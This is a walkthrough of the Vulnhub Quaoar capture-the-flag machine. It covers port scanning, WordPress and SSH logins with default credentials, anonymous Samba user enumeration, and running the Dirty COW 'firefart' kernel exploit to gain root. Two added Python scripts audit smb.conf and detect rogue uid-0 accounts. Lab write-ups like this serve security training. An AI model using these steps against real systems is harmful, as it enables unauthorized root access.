Vulnhub Quaoar Walkthrough

Below you’ll find my results from the Vulnhub Quaoar machine, found here. There are a few ways to root this…here’s what I did initially.

First – NMAP Discovery (yes, I cheated and got the IP from my DHCP server…)

nmap -sS -sV -p-

Starting Nmap 7.60 ( ) at 2017-10-28 23:37 EDT

Nmap scan report for
Host is up (0.030s latency).
Not shown: 65526 closed ports
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
53/tcp  open  domain      ISC BIND 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
995/tcp open  ssl/pop3    Dovecot pop3d
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We see 80 open, so let’s check for low hanging fruit here…

root@kali:~# curl
Disallow: Hackers
Allow: /wordpress/
#  /___ \_   _  __ _  ___   __ _ _ __ 
# //  / / | | |/ _` |/ _ \ / _` | '__|
#/ \_/ /| |_| | (_| | (_) | (_| | |   
#\___,_\ \__,_|\__,_|\___/ \__,_|_|

Ok…there may be a WP install, let’s check it out.

root@kali:~# curl | html2text 
****** Quaoar ******
 Primary Menu Skip_to_content
    * Sample_Page
 Search for: [Unknown INPUT type]  [Search]

****** What_is_Quaoar? ******
October_22,_2016 admin

****** Hello_world! ******
October_12,_2016 admin
Welcome to WordPress. This is your first post. Edit or delete it, then start
***** Just another WordPress site *****
 Search for: [Unknown INPUT type]  [Search]
****** Recent Posts ******
    * What_is_Quaoar?
    * Hello_world!
****** Recent Comments ******
****** Archives ******
    * October_2016
****** Categories ******
    * Uncategorized
****** Meta ******
    * Log_in
    * Entries_RSS
    * Comments_RSS

Go to …/wp-admin, try the obvious combinations of usernames and passwords, and, lo and behold, we’re successful. (admin/admin)

WordPress admin access

Let’s make a note of that for now, and check a few other things. Since we saw 139 and 445 open, let’s check that out.

root@kali:~# enum4linux
Starting enum4linux v0.8.9 ( ) on Sun Oct 29 08:53:32 2017

|    Target Information    |
Target ...........
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

|    Enumerating Workgroup/Domain on    |
[+] Got domain/workgroup name: WORKGROUP

|    Nbtstat Information for    |
Looking up status of
  QUAOAR          <00> -         B <ACTIVE>  Workstation Service
  QUAOAR          <03> -         B <ACTIVE>  Messenger Service
  QUAOAR          <20> -         B <ACTIVE>  File Server Service
  ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
  WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
  WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
  WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name

  MAC Address = 00-00-00-00-00-00

|    Session Check on    |
[+] Server allows sessions using username '', password ''

|    Getting domain SID for    |
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

|    OS information on    |
Use of uninitialized value $os_info in concatenation (.) or string at ./ line 464.
[+] Got OS info for from smbclient: 
[+] Got OS info for from srvinfo:
  QUAOAR         Wk Sv PrQ Unx NT SNT Quaoar server (Samba, Ubuntu)
  platform_id     :	500
  os version      :	4.9
  server type     :	0x809a03

|    Users on    |
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody	Name: nobody	Desc: 
index: 0x2 RID: 0x3e8 acb: 0x00000010 Account: viper	Name: viper	Desc: 
index: 0x3 RID: 0x3ea acb: 0x00000010 Account: wpadmin	Name: 	Desc: 
index: 0x4 RID: 0x3e9 acb: 0x00000010 Account: root	Name: root	Desc: 

user:[nobody] rid:[0x1f5]
user:[viper] rid:[0x3e8]
user:[wpadmin] rid:[0x3ea]
user:[root] rid:[0x3e9]
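The null session enum4linux reports above (username '', password '') is what makes the user list obtainable anonymously. As an added example, not part of the original walkthrough and not Quaoar's real configuration, here is a small audit that parses smb.conf text and flags the global and per-share settings that permit anonymous enumeration. The two config fragments are constructed for the demo; the parameter names (`restrict anonymous`, `map to guest`, `null passwords`, `guest ok`) are real Samba directives, and the defaults assumed when a parameter is absent are Samba's documented defaults.

```python
"""Audit smb.conf text for settings that allow null-session enumeration.

Added example (not from the walkthrough). Both config strings below are
constructed for the demo, not taken from the Quaoar VM.
"""

# Constructed: a configuration that permits the anonymous session enum4linux used.
WEAK_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = Quaoar server
   map to guest = Bad User
   restrict anonymous = 0
   null passwords = yes

[public]
   path = /srv/samba/public
   guest ok = yes
"""

# Constructed: the same host with anonymous access refused.
HARDENED_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = file server
   map to guest = Never
   restrict anonymous = 2
   null passwords = no

[public]
   path = /srv/samba/public
   guest ok = no
"""

TRUE_VALUES = {"yes", "true", "1"}


def parse_smb_conf(text):
    """Parse smb.conf-style text into {section: {parameter: value}}.

    Section and parameter names are lower-cased; '#' and ';' comment lines
    and lines outside any section are ignored.
    """
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def audit_null_session(conf):
    """Return a list of findings explaining why anonymous enumeration works.

    An empty list means none of the checked settings permits it.
    """
    findings = []
    g = conf.get("global", {})

    # restrict anonymous = 2 refuses anonymous IPC$ connections; the Samba
    # default of 0 is what lets enum4linux open a session with ''/''.
    ra = g.get("restrict anonymous", "0")
    if ra != "2":
        findings.append("global: restrict anonymous = %s (expected 2)" % ra)

    # Anything other than Never maps failed logins to the guest account.
    mtg = g.get("map to guest", "never")
    if mtg.lower() != "never":
        findings.append("global: map to guest = %s (expected Never)" % mtg)

    if g.get("null passwords", "no").lower() in TRUE_VALUES:
        findings.append("global: null passwords = yes")

    # Guest-accessible shares give an anonymous client a foothold too.
    for name, params in conf.items():
        if name == "global":
            continue
        if params.get("guest ok", "no").lower() in TRUE_VALUES:
            findings.append("share %s: guest ok = yes" % name)
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(label, audit_null_session(parse_smb_conf(text)) or "no findings")
```

Run it against a copy of the real smb.conf to lint the settings, then confirm from another host with the same enum4linux or `rpcclient -U ''` session the walkthrough used; the lint only reads the file, it does not prove what the running daemon accepts.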


Interesting…there’s a local user “wpadmin”. Since the WP install was using admin/admin, let’s see if wpadmin might be using something similar. (wpadmin/wpadmin)

root@kali:~# ssh wpadmin@
wpadmin@'s password: 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

 * Documentation:

  System information as of Sun Oct 29 08:58:06 EDT 2017

Success! Let’s check some basics…and find our flag.

$ echo $SHELL
$ pwd
$ ls -lahS
total 12K
drwxr-xr-x 2 root root    4.0K Oct 22  2016 .
drwxr-xr-x 3 root root    4.0K Oct 24  2016 ..
-rw-r--r-- 1 wpadmin  wpadmin   33 Oct 22  2016 flag.txt
$ cat flag.txt

Now here’s where you could go a couple of different directions. For better or worse, I went for the quick and easy win, and it worked.

Check the kernel version…

$ uname -a
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux

With the OSCP labs still fresh in my mind, I know there are several vulnerabilities that affect this kernel. One of those is “dirtycow,” along with a derivative, “firefart.” Not the best options if you’re going for stealth of course, but in this case, we’re not focused on that.

On our target machine, we check to see if gcc is installed, which it is not. We then copy the exploit to our Kali machine, and compile it there. Since we have ssh access onto the target, we can scp the file over. Note – /home/wpadmin was owned by root and the wpadmin user had no write access to it…so we save the exploit to /tmp.

$ gcc -v
-sh: 15: gcc: not found

root@kali:~# gcc -pthread dirty.c -o dirty -lcrypt -m32
root@kali:~# scp dirty wpadmin@
wpadmin@'s password: 
dirty                                                                                                   100%   12KB   2.4MB/s   00:00 

On our target, we make the file executable and run it.

$ chmod +x dirty
$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 
Complete line:

mmap: b77bb000

madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'firefart'.

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'firefart'.

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
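The exploit's own output above tells you exactly what it leaves behind: a new root-equivalent user written into /etc/passwd and the original file saved as /tmp/passwd.bak. As an added example (not part of the walkthrough, and not the exploit's code), here is the check a defender would run to spot that footprint: parse /etc/passwd, flag any uid-0 account that isn't root and any account carrying a password hash in /etc/passwd rather than /etc/shadow, and diff the current file against the leftover backup. The passwd lines below are constructed for the demo; the account name 'firefart' and the backup path come from the exploit output on the page, and the hash is a placeholder.

```python
"""Detect the /etc/passwd footprint described in the exploit output.

Added example (not from the walkthrough). SAMPLE_BACKUP and SAMPLE_PASSWD
are constructed; the hash field for 'firefart' is a placeholder.
"""
import os

# Constructed: what /tmp/passwd.bak would hold (the pre-exploit file).
SAMPLE_BACKUP = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
viper:x:1000:1000:viper,,,:/home/viper:/bin/bash
wpadmin:x:1001:1001::/home/wpadmin:/bin/sh
"""

# Constructed: the same file after an extra uid-0 account has been appended.
SAMPLE_PASSWD = SAMPLE_BACKUP + "firefart:PLACEHOLDERHASH:0:0:constructed:/root:/bin/bash\n"

# Values in the password field that mean "no hash stored here".
NO_HASH = {"x", "*", "!", ""}


def find_rogue_root_accounts(passwd_text):
    """Return (kind, detail) findings from passwd-format text.

    kinds: 'extra_uid0'      -> uid 0 account whose name is not root
           'hash_in_passwd'  -> password field holds a hash, not x/*/!
           'malformed'       -> line does not have 7 colon-separated fields
    """
    findings = []
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            findings.append(("malformed", line))
            continue
        name, pw, uid = fields[0], fields[1], int(fields[2])
        if uid == 0 and name != "root":
            findings.append(("extra_uid0", name))
        # Shadowed systems keep hashes in /etc/shadow; a hash here means the
        # file was edited by something other than the normal user tools.
        if pw not in NO_HASH and not pw.startswith("!"):
            findings.append(("hash_in_passwd", name))
    return findings


def added_entries(backup_text, current_text):
    """Lines present in the current passwd text but absent from the backup."""
    old = set(backup_text.splitlines())
    return [line for line in current_text.splitlines() if line and line not in old]


def backup_artifact_present(path="/tmp/passwd.bak"):
    """True if the backup file the exploit writes still exists on this host."""
    return os.path.exists(path)


def audit_host(passwd_path="/etc/passwd", backup_path="/tmp/passwd.bak"):
    """Run all three checks against the live files and return a report dict."""
    with open(passwd_path) as fh:
        current = fh.read()
    report = {"findings": find_rogue_root_accounts(current),
              "backup_present": backup_artifact_present(backup_path),
              "added_since_backup": []}
    if report["backup_present"]:
        with open(backup_path) as fh:
            report["added_since_backup"] = added_entries(fh.read(), current)
    return report


if __name__ == "__main__":
    print(find_rogue_root_accounts(SAMPLE_PASSWD))
    print(added_entries(SAMPLE_BACKUP, SAMPLE_PASSWD))
```

On a real host `audit_host()` reads the live files; the stand-alone run uses only the constructed samples. The uid-0 check is the durable one: a backup file in /tmp disappears on reboot, but the extra root account stays until someone removes it.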

Then we can log in to the target using our newly created “firefart” account.

root@kali:~# ssh firefart@
firefart@'s password: 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

 * Documentation:

  System information as of Sun Oct 29 09:23:56 EDT 2017

firefart@Quaoar:~# cd /root
firefart@Quaoar:~# ls
flag.txt vmware-tools-distrib
firefart@Quaoar:~# cat flag.txt 

Admittedly, I did not find the 3rd flag. However, there is a good write up here: which also provides some good advice on why to check cron jobs…in this case, because the 3rd flag was there!

Nicely done, k0ncepts.